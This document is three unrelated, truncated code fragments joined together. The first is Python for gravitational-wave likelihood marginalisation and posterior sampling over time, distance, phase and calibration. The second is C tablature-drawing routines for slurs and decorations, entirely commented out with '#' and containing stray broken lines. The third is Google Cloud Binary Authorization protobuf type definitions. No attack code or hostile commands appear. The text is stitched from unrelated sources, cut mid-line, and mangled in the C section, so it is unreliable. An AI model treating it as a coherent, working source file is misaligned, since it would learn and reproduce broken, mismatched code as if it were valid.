new_time = self.generate_time_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['geocent_time'] = new_time
if self.distance_marginalization:
new_distance = self.generate_distance_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['luminosity_distance'] = new_distance
if self.phase_marginalization:
new_phase = self.generate_phase_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['phase'] = new_phase
return self.parameters.copy()
def generate_calibration_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for the set of calibration response curves when
explicitly marginalizing over the calibration uncertainty.
Parameters
----------
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
-------
new_calibration: dict
Sample set from the calibration posterior
"""
if 'recalib_index' in self.parameters:
self.parameters.pop('recalib_index')
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
calibration_post = np.exp(log_like - max(log_like))
calibration_post /= np.sum(calibration_post)
new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
return new_calibration
def generate_time_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for coalescence
time when using a likelihood which explicitly marginalises over time.
In order to resolve the posterior we artificially upsample to 16kHz.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_time: float
Sample from the time posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
times = create_time_series(
sampling_frequency=16384,
starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
duration=self.waveform_generator.duration)
times = times % self.waveform_generator.duration
times += self.waveform_generator.start_time
prior = self.priors["geocent_time"]
in_prior = (times >= prior.minimum) & (times < prior.maximum)
times = times[in_prior]
n_time_steps = int(self.waveform_generator.duration * 16384)
d_inner_h = np.zeros(len(times), dtype=complex)
psd = np.ones(n_time_steps)
signal_long = np.zeros(n_time_steps, dtype=complex)
data = np.zeros(n_time_steps, dtype=complex)
h_inner_h = np.zeros(1)
for ifo in self.interferometers:
ifo_length = len(ifo.frequency_domain_strain)
mask = ifo.frequency_mask
signal = ifo.get_detector_response(
signal_polarizations, self.parameters)
signal_long[:ifo_length] = signal
data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
h_inner_h += ifo.optimal_snr_squared(signal=signal).real
if self.distance_marginalization:
time_log_like = self.distance_marginalized_likelihood(
d_inner_h, h_inner_h)
elif self.phase_marginalization:
time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
else:
time_log_like = (d_inner_h.real - h_inner_h.real / 2)
time_prior_array = self.priors['geocent_time'].prob(times)
time_post = (
np.exp(time_log_like - max(time_log_like)) * time_prior_array)
keep = (time_post > max(time_post) / 1000)
if sum(keep) < 3:
keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
time_post = time_post[keep]
times = times[keep]
new_time = Interped(times, time_post).sample()
return new_time
def generate_distance_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for luminosity
distance when using a likelihood which explicitly marginalises over
distance.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Note: These are rescaled in place after the distance sample is
generated to allow further parameter reconstruction to occur.
Returns
=======
new_distance: float
Sample from the distance posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
d_inner_h_dist = (
d_inner_h * self.parameters['luminosity_distance'] /
self._distance_array)
h_inner_h_dist = (
h_inner_h * self.parameters['luminosity_distance']**2 /
self._distance_array**2)
if self.phase_marginalization:
distance_log_like = (
ln_i0(abs(d_inner_h_dist)) -
h_inner_h_dist.real / 2
)
else:
distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
self.distance_prior_array)
new_distance = Interped(
self._distance_array, distance_post).sample()
self._rescale_signal(signal_polarizations, new_distance)
return new_distance
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
def generate_phase_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for phase when
using a likelihood which explicitly marginalises over phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_phase: float
Sample from the phase posterior.
Notes
=====
This is only valid when assumes that mu(phi) \propto exp(-2i phi).
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
phases = np.linspace(0, 2 * np.pi, 101)
phasor = np.exp(-2j * phases)
phase_log_post = d_inner_h * phasor - h_inner_h / 2
phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
new_phase = Interped(phases, phase_post).sample()
return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
if self.distance_marginalization:
log_l_tc_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_tc_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array,
h_inner_h=h_inner_h)
else:
log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
return logsumexp(log_l_tc_array, b=time_prior_array)
def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
_time_prior = self.priors['geocent_time']
time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
times = times[time_mask]
time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
d_inner_h_array = d_inner_h_array[:, time_mask]
h_inner_h = h_inner_h
if self.distance_marginalization:
log_l_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=h_inner_h)
else:
log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
return logsumexp(log_l_array, b=prior_array)
def get_calibration_log_likelihoods(self, signal_polarizations=None):
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=signal_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
d_inner_h_array += per_detector_snr.d_inner_h_array
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
else:
log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
def _setup_rho(self, d_inner_h, optimal_snr_squared):
optimal_snr_squared_ref = (optimal_snr_squared.real *
self.parameters['luminosity_distance'] ** 2 /
self._ref_dist ** 2.)
d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
self._ref_dist)
return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
return self.log_likelihood_ratio() + self.noise_log_likelihood()
@property
def _delta_distance(self):
return self._distance_array[1] - self._distance_array[0]
@property
def _dist_multiplier(self):
''' Maximum value of ref_dist/dist_array '''
return self._ref_dist / self._distance_array[0]
@property
def _optimal_snr_squared_ref_array(self):
""" Optimal filter snr at fiducial distance of ref_dist Mpc """
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
@property
def _d_inner_h_ref_array(self):
""" Matched filter snr at fiducial distance of ref_dist Mpc """
if self.phase_marginalization:
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
else:
n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
return np.hstack((
-np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
))
def _setup_distance_marginalization(self, lookup_table=None):
if isinstance(lookup_table, str) or lookup_table is None:
self.cached_lookup_table_filename = lookup_table
lookup_table = self.load_lookup_table(
self.cached_lookup_table_filename)
if isinstance(lookup_table, dict):
if self._test_cached_lookup_table(lookup_table):
self._dist_margd_loglikelihood_array = lookup_table[
'lookup_table']
else:
self._create_lookup_table()
else:
self._create_lookup_table()
self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
if self._lookup_table_filename is None:
self._lookup_table_filename | |
D_DYN_PP:
# PUT2("(pp) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_P:
# PUT2("(p) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_MP:
# PUT2("(mp) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_MF:
# PUT2("(mf) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_F:
# PUT2("(f) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_FF:
# PUT2("(ff) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_SF:
# PUT2("(sf) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# case D_DYN_SFZ:
# PUT2("(sfz) %.1f %.1f dyn\n", x, *gchy-16);
# *gchy-=18;
# break;
# }
# }
#
# # decorations applying to individual notes
# for (i=0;i<s->npitch;i++) {
# if (german)
# line = i+1;
# else
# line = tabline(s->pits[i]);
# switch (s->tabdeco[i]) {
# case D_TABACC:
# PUT2("%.1f %.1f tabacc\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABX:
# PUT2("%.1f %.1f tabx\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABU:
# PUT2("%.1f %.1f tabu\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABV:
# PUT2("%.1f %.2f tabv\n", x, 0.125+fingeringshift+line);
# break;
# case D_TABSTAR:
# PUT2("%.1f %.1f tabstar\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABCROSS:
# PUT2("%.1f %.1f tabcross\n", x+1+(float)tabfont.size/2.0,
# tablineshift+line);
# break;
# case D_TABOLINE:
# if (italian)
# std::cerr << "Warning: decoration 'L' (oblique line) ignored in italiantab" << std::endl;
# else if (german)
# std::cerr << "Warning: decoration 'L' (oblique line) ignored in germantab" << std::endl;
# else
# PUT2("%.1f %.2f taboline\n", x, fingeringshift+line);
# break;
# }
# }
# }
#
# #*************************************************************************
# * draw_tabslurs - draw all slurs in current line
# *************************************************************************
# void draw_tabslurs (void)
# {
# int i,m1,m2,i1,i2;
#
# # flags for slurs across line breaks
# static int normalleftover = 0;
# static int chordleftover = 0;
#
# #
# * slurs outside of chords
#
# # close slurs from previous line
# if (normalleftover) {
# normalleftover=0;
# i=0;
# while (!sym[i].slur_end && (i<nsym)) i++;
# if (i<nsym)
# draw_tabnormalslur(-1,i);
# }
# # draw slurs starting in this line
# i1=i2=-1;
# for (i=0;i<nsym;i++) {
# if ((sym[i].type==NOTE) && sym[i].slur_st) {
# i1=i;
# while (!sym[i].slur_end && (i<nsym)) i++;
# i2=i;
# draw_tabnormalslur(i1,i2);
# if (i2>=nsym)
# normalleftover=1;
# }
# }
#
# #
# * slurs inside of chords
# * (only slurs between neighbouring chords are allowed)
#
# # close slurs from previous line
# if (chordleftover) {
# chordleftover=0;
# i=0;
# while (i<nsym) {
# int slurend=0;
# if (sym[i].type==NOTE) {
# for (m2=0;m2<sym[i].npitch;m2++)
# if (sym[i].ti2[m2] || sym[i].sl2[m2])
# {slurend=1; break;}
# }
# if (slurend) break;
# i++;
# }
# if (i<nsym)
# draw_tabchordslurs(-1,i);
# }
# # draw slurs starting this line
# for (i=0;i<nsym;i++) {
# if (sym[i].type==NOTE) {
# # determine start and end of next chord-tie
# i1=-1;
# for (m1=0;m1<sym[i].npitch;m1++) {
# if ((sym[i].ti1[m1]) || (sym[i].sl1[m1])) {
# i1=i;
# i++;
# while (i<nsym) {
# int slurend=0;
# if (sym[i].type==NOTE) {
# for (m2=0;m2<sym[i].npitch;m2++)
# if (sym[i].ti2[m2] || sym[i].sl2[m2])
# {slurend=1; break;}
# }
# if (slurend) break;
# i++;
# }
# i2=i;
# break;
# }
# }
# if (i1>=0)
# draw_tabchordslurs(i1,i2);
# if (i2>=nsym)
# chordleftover=1;
# }
# }
# }
#
# #*************************************************************************
# * draw_tabnormalslur - draws slur between specified symbols
# * if to >= nsym, slur is drawn till end of line
# * if from < 0, slur is drawn from line beginning
# *************************************************************************
# void draw_tabnormalslur (int from, int to)
# {
# int hc1,hc2,cut;
# float x1,y1,x2,y2,direction,height,shift;
#
# x1=y1=x2=y2=0;
#
# #
# * get positions for slur
#
# if (from >= 0) {
# x1 = sym[from].x;
# hc1 = tabline(highest_course(&sym[from]));
# y1 = (6-hc1) * tabfont.size;
#
# # horizontal shift if next course in chord used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# }
# if (to < nsym) {
# x2 = sym[to].x;
# hc2 = tabline(highest_course(&sym[to]));
# y2 = (6-hc2) * tabfont.size;
# =
# # horizontal shift if next course in chord used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# }
#
# # special treatment of slurs over line breaks
# if (from < 0) {
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# y1=y2;
# }
# if (to >= nsym) {
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# y2=y1;
# }
#
#
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
#
# #*************************************************************************
# * draw_tabchordslurs - draws slurs between specified chords
# * if to >= nsym, slurs are drawn till end of line
# * if from < 0, slurs are drawn from line beginning
# *************************************************************************
# void draw_tabchordslurs (int from, int to)
# {
# int m,m1,m2,hc1,hc2,cut;
# float x1,y1,x2,y2,direction,height,shift;
#
# #
# * slurs within one line
#
#
# if ((from>=0) && (to<nsym)) {
# m2=0;
# for (m1=0;m1<sym[from].npitch;m1++) {
# # ties
# if (sym[from].ti1[m1]) {
# sym[from].ti1[m1] = 0; #mark as done
# for (m=m2;m<sym[to].npitch;m++)
# if (sym[to].ti2[m]) {
# m2=m;
# sym[to].ti2[m] = 0; #mark as done
# break;
# }
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[from].sl1[m1]) {
# sym[from].sl1[m1] = 0; #mark as done
# for (m=m2;m<sym[to].npitch;m++)
# if (sym[to].sl2[m]) {
# m2=m;
# sym[to].sl2[m] = 0; #mark as done
# break;
# }
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
#
#
# #
# * special treatment for slurs across line breaks
#
#
# #slur start in previous line
# if (from<0) {
# for (m2=0;m2<sym[to].npitch;m2++) {
# # ties
# if (sym[to].ti2[m2]) {
# sym[to].ti2[m2] = 0; #mark as done
# # get positions for slur
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# hc1 = hc2;
# y1 = y2;
# # extra space if next course in chords used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[to].sl2[m2]) {
# sym[to].sl2[m2] = 0; #mark as done
# # get positions for slur
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# hc1 = hc2;
# y1 = y2;
# # extra space if next course in chords used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
#
# # slur end in next line
# if (to>=nsym) {
# for (m1=0;m1<sym[from].npitch;m1++) {
# # ties
# if (sym[from].ti1[m1]) {
# sym[from].ti1[m1] = 0; #mark as done
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# hc2 = hc1;
# y2 = y1;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[from].sl1[m1]) {
# sym[from].sl1[m1] = 0; #mark as done
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# hc2 = hc1;
# y2 = y1;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
# }
#
# #*************************************************************************
# * tab_slurhift - return veritcal shift for tablature slurs
# * in current voice. A return value > 0 means a shift towards
# * the next higher course
# *************************************************************************
# float tab_slurshift()
# {
# if (voice[ivc].key.ktype==FRENCHTAB ||
# voice[ivc].key.ktype==FRENCH5TAB ||
# voice[ivc].key.ktype==FRENCH4TAB)
# return 0.0;
# else #italiantab or spanishtab
# return 0.25 * tabfont.size;
# }
#
# #*************************************************************************
# * draw_tabtenutos - draw all tenuto strokes in current line
# *************************************************************************
# void draw_tabtenutos (void)
# {
# int i,m,m1,m2,from,to,hc1,hc2;
# float x1,y1,x2,y2;
#
# from=to=-1;
# for (i=0;i<nsym;i++) {
# # find start and end of tenuto sign
# if (sym[i].type==NOTE && sym[i].ten_st) {
# from=i;
# while (!sym[i].ten_end && | |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.cloud.binaryauthorization.v1',
manifest={
'Policy',
'AdmissionWhitelistPattern',
'AdmissionRule',
'Attestor',
'UserOwnedGrafeasNote',
'PkixPublicKey',
'AttestorPublicKey',
},
)
class Policy(proto.Message):
r"""A [policy][google.cloud.binaryauthorization.v1.Policy] for container
image binary authorization.
Attributes:
name (str):
Output only. The resource name, in the format
``projects/*/policy``. There is at most one policy per
project.
description (str):
Optional. A descriptive comment.
global_policy_evaluation_mode (google.cloud.binaryauthorization_v1.types.Policy.GlobalPolicyEvaluationMode):
Optional. Controls the evaluation of a
Google-maintained global admission policy for
common system-level images. Images not covered
by the global policy will be subject to the
project admission policy. This setting has no
effect when specified inside a global admission
policy.
admission_whitelist_patterns (Sequence[google.cloud.binaryauthorization_v1.types.AdmissionWhitelistPattern]):
Optional. Admission policy allowlisting. A
matching admission request will always be
permitted. This feature is typically used to
exclude Google or third-party infrastructure
images from Binary Authorization policies.
cluster_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.ClusterAdmissionRulesEntry]):
Optional. Per-cluster admission rules. Cluster spec format:
``location.clusterId``. There can be at most one admission
rule per cluster spec. A ``location`` is either a compute
zone (e.g. us-central1-a) or a region (e.g. us-central1).
For ``clusterId`` syntax restrictions see
https://cloud.google.com/container-engine/reference/rest/v1/projects.zones.clusters.
kubernetes_namespace_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.KubernetesNamespaceAdmissionRulesEntry]):
Optional. Per-kubernetes-namespace admission rules. K8s
namespace spec format: [a-z.-]+, e.g. 'some-namespace'
kubernetes_service_account_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.KubernetesServiceAccountAdmissionRulesEntry]):
Optional. Per-kubernetes-service-account admission rules.
Service account spec format: ``namespace:serviceaccount``.
e.g. 'test-ns:default'
istio_service_identity_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.IstioServiceIdentityAdmissionRulesEntry]):
Optional. Per-istio-service-identity
admission rules. Istio service identity spec
format:
spiffe://<domain>/ns/<namespace>/sa/<serviceaccount>
or <domain>/ns/<namespace>/sa/<serviceaccount>
e.g. spiffe://example.com/ns/test-ns/sa/default
default_admission_rule (google.cloud.binaryauthorization_v1.types.AdmissionRule):
Required. Default admission rule for a
cluster without a per-cluster, per- kubernetes-
service-account, or per-istio-service-identity
admission rule.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time when the policy was last
updated.
"""
class GlobalPolicyEvaluationMode(proto.Enum):
r""""""
GLOBAL_POLICY_EVALUATION_MODE_UNSPECIFIED = 0
ENABLE = 1
DISABLE = 2
name = proto.Field(
proto.STRING,
number=1,
)
description = proto.Field(
proto.STRING,
number=6,
)
global_policy_evaluation_mode = proto.Field(
proto.ENUM,
number=7,
enum=GlobalPolicyEvaluationMode,
)
admission_whitelist_patterns = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='AdmissionWhitelistPattern',
)
cluster_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=3,
message='AdmissionRule',
)
kubernetes_namespace_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=10,
message='AdmissionRule',
)
kubernetes_service_account_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=8,
message='AdmissionRule',
)
istio_service_identity_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=9,
message='AdmissionRule',
)
default_admission_rule = proto.Field(
proto.MESSAGE,
number=4,
message='AdmissionRule',
)
update_time = proto.Field(
proto.MESSAGE,
number=5,
message=timestamp_pb2.Timestamp,
)
class AdmissionWhitelistPattern(proto.Message):
r"""An [admission allowlist
pattern][google.cloud.binaryauthorization.v1.AdmissionWhitelistPattern]
exempts images from checks by [admission
rules][google.cloud.binaryauthorization.v1.AdmissionRule].
Attributes:
name_pattern (str):
An image name pattern to allowlist, in the form
``registry/path/to/image``. This supports a trailing ``*``
wildcard, but this is allowed only in text after the
``registry/`` part. This also supports a trailing ``**``
wildcard which matches subdirectories of a given entry.
"""
name_pattern = proto.Field(
proto.STRING,
number=1,
)
class AdmissionRule(proto.Message):
r"""An [admission
rule][google.cloud.binaryauthorization.v1.AdmissionRule] specifies
either that all container images used in a pod creation request must
be attested to by one or more
[attestors][google.cloud.binaryauthorization.v1.Attestor], that all
pod creations will be allowed, or that all pod creations will be
denied.
Images matching an [admission allowlist
pattern][google.cloud.binaryauthorization.v1.AdmissionWhitelistPattern]
are exempted from admission rules and will never block a pod
creation.
Attributes:
evaluation_mode (google.cloud.binaryauthorization_v1.types.AdmissionRule.EvaluationMode):
Required. How this admission rule will be
evaluated.
require_attestations_by (Sequence[str]):
Optional. The resource names of the attestors that must
attest to a container image, in the format
``projects/*/attestors/*``. Each attestor must exist before
a policy can reference it. To add an attestor to a policy
the principal issuing the policy change request must be able
to read the attestor resource.
Note: this field must be non-empty when the evaluation_mode
field specifies REQUIRE_ATTESTATION, otherwise it must be
empty.
enforcement_mode (google.cloud.binaryauthorization_v1.types.AdmissionRule.EnforcementMode):
Required. The action when a pod creation is
denied by the admission rule.
"""
class EvaluationMode(proto.Enum):
r""""""
EVALUATION_MODE_UNSPECIFIED = 0
ALWAYS_ALLOW = 1
REQUIRE_ATTESTATION = 2
ALWAYS_DENY = 3
class EnforcementMode(proto.Enum):
r"""Defines the possible actions when a pod creation is denied by
an admission rule.
"""
ENFORCEMENT_MODE_UNSPECIFIED = 0
ENFORCED_BLOCK_AND_AUDIT_LOG = 1
DRYRUN_AUDIT_LOG_ONLY = 2
evaluation_mode = proto.Field(
proto.ENUM,
number=1,
enum=EvaluationMode,
)
require_attestations_by = proto.RepeatedField(
proto.STRING,
number=2,
)
enforcement_mode = proto.Field(
proto.ENUM,
number=3,
enum=EnforcementMode,
)
class Attestor(proto.Message):
r"""An [attestor][google.cloud.binaryauthorization.v1.Attestor] that
attests to container image artifacts. An existing attestor cannot be
modified except where indicated.
Attributes:
name (str):
Required. The resource name, in the format:
``projects/*/attestors/*``. This field may not be updated.
description (str):
